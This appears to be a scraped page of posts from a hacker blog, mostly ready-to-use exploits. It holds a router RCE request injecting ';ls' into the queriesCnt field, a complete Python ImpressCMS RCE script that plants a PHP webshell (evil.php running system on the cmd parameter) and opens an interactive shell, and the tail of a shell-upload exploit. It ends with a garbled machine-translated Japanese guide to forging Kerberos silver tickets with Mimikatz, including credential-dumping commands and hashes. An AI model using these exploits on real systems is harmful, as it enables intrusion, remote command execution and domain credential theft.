except: print("Failed to find shell\n") else: print("Login failed!\n") except: print("Something Went Wrong!\n") ######################################################### #FILE LOCATION : http://localhost/purchase_order/uploads/1631583540_shell.php?tapesh=dir
  23. HireHackking

    Seowon 130-SLC router - 'queriesCnt' Remote Code Execution (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Seowon 130-SLC router - 'queriesCnt' Remote Code Execution (Unauthenticated) # Date: 2021-09-15 # Exploit Author: Aryan Chehreghani # Vendor Homepage: http://www.seowonintech.co.kr # Software Link: http://www.seowonintech.co.kr/en/product/detail.asp?num=150&big_kindB05&middle_kindB05_29 # Version: All Version # Tested on: Windows 10 Enterprise x64 , Linux # [ About - Seowon 130-SLC router ] : #The SLC-130 series are all-in-one LTE CPE that delights you in handling multi-purpose environments that require data and WiFi, #Its sophisticated and stable operation helps you excel yourself at office and home, #Improve communication with excellence and ease your life. # [ Description ]: #Execute commands without authentication as admin user , #To use it in all versions, we only enter the router ip & Port(if available) in the request #The result of the request is visible on the browser page # [ Sample RCE Request ] : POST / HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0 Cyberfox/52.9.1 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Referer: http://192.168.1.1:443/diagnostic.html?t=201701020919 Content-Length: 183 Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin Connection: keep-alive Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;ls&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928
  24. HireHackking

    ImpressCMS 1.4.2 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ImpressCMS 1.4.2 - Remote Code Execution (RCE) (Authenticated) # Date: 15-09-2021 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Vendor Homepage: https://www.impresscms.org/ # Software Link: https://www.impresscms.org/modules/downloads/ # Version: 1.4.2 # Category: Webapps # Tested on: Linux/Windows # ImpressCMS is a multilingual content management system for the web # Contains an endpoint that allows remote access # Autotask page misconfigured, causing security vulnerability # Example: python3 exploit.py -u http://example.com -l admin -p Admin123 import requests import argparse import sys from time import sleep session = requests.session() def main(): parser = argparse.ArgumentParser(description='Impresscms Version 1.4.2 - Remote Code Execution (Authenticated)') parser.add_argument('-u', '--host', type=str, required=True) parser.add_argument('-l', '--login', type=str, required=True) parser.add_argument('-p', '--password', type=str, required=True) args = parser.parse_args() print("\nImpresscms Version 1.4.2 - Remote Code Execution (Authenticated)", "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n") exploit(args) def countdown(time_sec): while time_sec: mins, secs = divmod(time_sec, 60) timeformat = '{:02d}'.format(secs) print("["+timeformat+"] The task is expected to run!", end='\r') sleep(1) time_sec -= 1 def exploit(args): #Check http or https if args.host.startswith(('http://', 'https://')): print("[?] Check Url...\n") args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] sleep(2) else: print("\n[?] Check Adress...\n") args.host = "http://" + args.host args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] sleep(2) try: response = requests.get(args.host) if response.status_code != 200: print("[-] Address not reachable!") sleep(2) exit(1) except requests.ConnectionError as exception: print("[-] Address not reachable") exit(1) response = requests.get(args.host + "/evil.php") if response.status_code == 200: print("[*] Exploit file exists!\n") sleep(2) print("[+] Exploit Done!\n") while True: cmd = input("$ ") url = args.host + "/evil.php?cmd=" + cmd headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" } response = requests.post(url, headers=headers, timeout=5) if response.text == "": print(cmd + ": command not found\n") else: print(response.text) else: #Login and set cookie url = args.host + "/user.php" cookies = { "ICMSSESSION": "gjj2svl7qjqorj5rs87b6thmi5" } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host, "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = { "uname": args.login, "pass": args.password, "xoops_redirect": "/", "op": "login" } response = session.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False) new_cookies = session.cookies.get("ICMSSESSION") if (new_cookies is None): print("[-] Login Failed...\n") print("Your username or password is incorrect.") sleep(2) exit(1) else: print("[+] Success Login...\n") sleep(2) # Create Tasks url = args.host + "/modules/system/admin.php?fct=autotasks&op=mod" cookies = { "ICMSSESSION": new_cookies } headers = { "Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": args.host, "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryZ2hA91yNO8FWPZmk", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/modules/system/admin.php?fct=autotasks&op=mod", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close" } data = "------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_id\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_lastruntime\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_name\"\r\n\r\nrce\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_code\"\r\n\r\nfile_put_contents('../evil.php', \"<?php system(\\x24_GET['cmd']); ?>\");\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_repeat\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_interval\"\r\n\r\n0001\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_onfinish\"\r\n\r\n0\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_enabled\"\r\n\r\n1\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_type\"\r\n\r\n:custom\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"sat_addon_id\"\r\n\r\n\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"icms_page_before_form\"\r\n\r\n"+args.host+"/modules/system/admin.php?fct=autotasks\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"op\"\r\n\r\naddautotasks\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk\r\nContent-Disposition: form-data; name=\"modify_button\"\r\n\r\nSubmit\r\n------WebKitFormBoundaryZ2hA91yNO8FWPZmk--\r\n" response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False) if response.headers.get("location") == args.host + "/modules/system/admin.php?fct=autotasks": print("[*] Task Create.\n") sleep(2) countdown(60) print("\n\n[+] Exploit Done!\n") sleep(2) while True: cmd = input("$ ") url = args.host + "/evil.php?cmd=" + cmd headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" } response = requests.post(url, headers=headers, timeout=5) if response.text == "": print(cmd + ": command not found\n") else: print(response.text) elif response.headers.get("location") == args.host + "/user.php": print("[!] Unauthorized user!\n\n") print("Requires user with create task permissions.") sleep(2) else: pass if __name__ == '__main__': main()
  25. HireHackking

    タイトル:Kerberosのシルバーノートの詳細な説明

    HireHackking posted a blog entry in Hacker Technology
    0x01シルバーチケット定義 シルバーチケットは、Kerberosチケット助成サービス(TGS)を偽造したチケットであり、サービスチケットとも呼ばれます。下の図に示すように、AS-REQとAS-REP(ステップ1および2)はなく、ドメインコントローラーとのTGS-REQ/TGS-REP(ステップ3および4)通信はありません。請求書は偽造されたTGSであるため、ドメインコントローラーと通信しません。 0x02シルバーノートの機能 1。シルバーノートは有効なノートグラントサービス(TGS)Kerberosノートです。これは、Kerberos検証サービスが実行する各サーバーがサービスを暗号化および署名しているためです。 2。ゴールドノートはTGTを偽造され、Kerberosサービスのために効果的に取得され、シルバーノートはTGSを偽造しています。これは、シルバーノートが特定のサーバー上の任意のサービスに限定されることを意味します。 3.ほとんどのサービスはPACを検証しません(PACチェックサムをPAC検証のためにドメインコントローラーに送信することで)。 4.攻撃者はサービスアカウントのパスワードのハッシュ値を必要とします 5。TGSは偽造されているため、TGTと通信しません。つまり、DCが検証されています。 6.任意のイベントログはターゲットサーバー上にあります。 0x03createシルバーノート シルバーノートを作成または鍛造するには、攻撃者はターゲットサービスアカウントのパスワードハッシュ値を取得する必要があります。ターゲットサービスが使用されているアカウント(MS SQLなど)の下で実行されている場合、サービスアカウントのパスワードハッシュは、紙幣を作成するために必要です。 kerberoast(https://github.com/nidem/kerberoast)を使用した亀裂サービスアカウントのパスワードは、ターゲットサービスに関連するパスワードデータを識別するための効果的な防止です。コンピューターホスティングサービスも最も一般的なサービスであり、Windowsファイル共有を利用する「CIFS」サービスです。コンピューター自体がこのサービスをホストするため、シルバーノートの作成に必要なパスワードデータは、関連するコンピューターアカウントのパスワードハッシュ値です。コンピューターがActive Directoryに結合されると、新しいコンピューターアカウントオブジェクトが作成され、コンピューターに追加されます。パスワードと関連するハッシュハッシュは、アカウントを所有するコンピューターに保存され、NTLMパスワードハッシュはドメインのドメインコントローラーのActive Directoryデータベースに保存されます。攻撃者がコンピューターで管理権を取得したり、ローカルシステムとしてコードを実行できる場合、攻撃者はMimikatzを使用して広告コンピューターアカウントのパスワードをシステムからダンプできます(NTLMパスワードハッシュはRC4 Kerberosチケットを暗号化するために使用されます): Mimikatz "Privilege:3360Debug" "sekurlsa:3360logonpasswords" #requires管理者の許可 0x04 Mimikatz Silver Notes注文 /ドメイン - lab.adsecurity.orgなどの完全なドメイン名 /SID - S-1-5-21-1473643419-774954089-2222329127などのドメインのSID /ユーザー - ドメインユーザー名 /groups(オプション) - ユーザーが属するグループは /チケット(オプション) - 後で使用するためにゴールデンチケットファイルを保存するパスと名前を提供するか、 /PTTを使用して金ノートをメモリに挿入してすぐに使用します /PTT- /チケットの代替品として、それを使用して、使用のために偽のチケットをメモリに即座に挿入します。 /ID(オプション) - ユーザーRID、MIMIKATZデフォルト値は500(デフォルトの管理者アカウントRID)です /startoffset(optional) - チケットが利用可能なときにオフセットを開始します(通常、このオプションを使用する場合は-10または0に設定)mimikatzデフォルト値は0です /Endin(オプション) - チケットの有効性時間、Mimikatzデフォルト値は10年、アクティブディレクトリのデフォルトKerberosポリシーは10時間に設定されています /RENEWMAX(オプション) - 更新の最大妥当性時間を更新する、Mimikatzデフォルト値は10年、アクティブディレクトリのデフォルトKerberosポリシーは最大7日間に設定 1。銀の請求書に必要なパラメーター /ターゲット - ターゲットサーバーのFQDN FQDN :(完全資格のあるドメイン名)完全資格のドメイン名:ホスト名とドメイン名の両方を備えた名前。 (シンボル "。") /サービス - ターゲットサーバーで実行されているKerberosサービス、サービスプリンシパルネームタイプはCIF、HTTP、MSSQLなどです。 /RC4 - サービスのNTLMハッシュ(コンピューターアカウントまたはユーザーアカウント) 2。シルバービルデフォルトグループ ドメインユーザーSID:S-1-5-21ドメイン-513 ドメイン管理SID:S-1-5-21ドメイン-512 アーキテクチャ管理者SID:S-1-5-21ドメイン-518 エンタープライズ管理者SID:S-1-5-21ドメイン-519 グループポリシー作成所有者SID:S-1-5-21ドメイン-520 3。シルバーノートを作成するミミカッツコマンド 次のMimikatzコマンドは、サーバーADSMSWIN2K8R2.lab.adsecurity.orgでCIFSサービスのシルバーノートを作成します。シルバーチケットを正常に作成するには、ADSMSWIN2K8R2.lab.adsecurity.orgの広告コンピューターアカウントパスワードのハッシュを取得するために、ADドメインダンプまたはローカルシステムでMimikatzを実行する必要があります。 NTLMパスワードハッシュは、RC4パラメーターで使用されます。サービスSPNタイプも /サービスパラメーターで識別する必要があります。ターゲットコンピューターのFQDAは、 /SIDパラメーターの /ターゲットパラメーターとドメインSIDで使用する必要があります。コマンドは次のとおりです。 Mimikatz "Kerberos:3360Golden /user:lukeskywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-777749494089-22229127 /target:Adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt "exit 0x05さまざまなサービスのシルバーノートの実際のリスト 1。シルバーノートのサービスリスト サービスタイプ サービスシルバーチケット WMI ホスト RPCSS Powershell リモート ホスト http winrm ホスト http スケジュール タスク ホスト Windows ファイル共有(CIFS) CIF ldap を含む操作 ミミカッツdcsync ldap Windows リモートサーバー管理ツール RPCSS ldap CIF 2。 Windows共有(CIFS)管理アクセスノート ターゲットコンピューターのWindows共有の管理権を取得するための「CIFS」サービスのシルバーノートを作成します。 CIFSシルバーチケットを注入した後、ターゲットコンピューターの共有にアクセスできるようになりました。 c $共有、共有ファイルにファイルをコピーできます。 3。Windowsコンピューター(ホスト)管理者の権利を備えたシルバーノート ターゲットコンピューターでカバーされているWindowsサービスの管理者の権利を取得するための銀行メモを作成します。これには、スケジュールされたタスクを変更および作成するための権限が含まれます。 ホストシルバーチケットを使用すると、新しい計画タスクを作成できます。 または、ホストシルバーチケットを活用することにより、既存の計画されたタスクを変更できます。 「HTTP」サービスと「WSMAN」サービスのシルバーチケットを作成して、ターゲットシステムをリモートするWINRMおよびOR PowerShellの管理権限を取得します。 2つのHTTP&WSMANシルバーノートを注入した後、PowerShellを使用してリモート(またはWinRM)を使用してターゲットシステムシェルをバウンスできます。まず、New-PssessionはPowerShellを使用して、リモートシステムへのセッション用のPowerShell CMDLETを作成し、EnterPSSessionがリモートシェルを開きます。 5。シルバーの請求書の証拠は、管理者の権利を備えたWindowsコンピューターのLDAPに接続されています ターゲットシステムを取得するための「LDAP」サービスのシルバーチケットを作成します(アクティブを含む ディレクトリ上のLDAPサービスの管理権。 LDAPシルバーチケットを使用すると、LDAPサービスにリモートにアクセスしてKRBTGTに関する情報を取得できます。 注:lsadump:dcsync 同期オブジェクトについてDCに質問を開始します(アカウントのパスワード情報を取得できます)。必要な許可には、管理者、ドメイン管理者、エンタープライズ管理者、およびドメインコントローラーのコンピューターアカウントが含まれます。読み取り専用ドメインコントローラーでは、デフォルトでユーザーパスワードデータを読み取ることができません。 6。シルバーメモの証拠は、管理者の権利を備えたWindowsコンピューターのWMIに接続されています WMIを使用してターゲットシステムでコマンドをリモートで実行する「ホスト」サービスと「RPCSS」サービスのシルバーノートを作成します。 これらのシルバーノートを注入した後、Kerberos TGSノートが「KLIST」を実行してメモリ内のシルバーノートに注入されていることを確認できます。WMICを呼び出したり、ターゲットシステムでコマンドを実行したりするために「被験者」を介してInvoke-Wmimethodができます。 Invoke -Wmimethod win32_process -computername $ computer -credential $ creds -name create -argumentlist "$ runcommand" 7。ドメイン制御に「CIFS」サービスリストにアクセス まず、次の情報を取得する必要があります。 /ドメイン /sid /ターゲット:ターゲットサーバーのドメイン名のフルネーム、ドメインコントロールのフルネームは次のとおりです。 /サービス:ターゲットサーバーのKerberosサービス、CIFSは次のとおりです /RC4:コンピューターアカウントのNTLMハッシュ、ドメイン制御ホストのコンピューターアカウント /ユーザー:偽造されるユーザー名、ここでは銀をテストできます ドメインコントロールで次のコマンドを実行して、ドメインコントロールホストのローカル管理者アカウントを取得します。 ミミカッツログ 'sekurlsa:3360logonpasswords' 図:に示すように 注記: ここでは、コンピューターアカウント、つまりユーザー名: win-8vlrpiajb0 $のntlmハッシュを見つける必要があります。別のアカウントの場合、失敗します。つまり、サービスアカウントを共有する必要があります。 上記の情報は次のとおりです。 /domain:test.local /SID:S-1-5-21-4155807533-921486164-2767329826 /target:win-8vvlrpiajb0.test.local /service3360cifs /RC4:D5304F9EA69523479560CA4EBB5A2155 /user3360Silver Mimikatzを使用してシルバーチケットをインポートします ミミカッツ 'kerberos:golden /domain:test.local /SID:S-1-5-21-4155807533-921486164-2767329826 /target:win-8vvlrpiajb0.test.local /service:cifs /RC4:D5304F9EA69523479560CA4EBB5A2155 /USER:SILVER /PTT ' 図に示すように、この時点でドメインコントロールのファイル共有に正常にアクセスできます。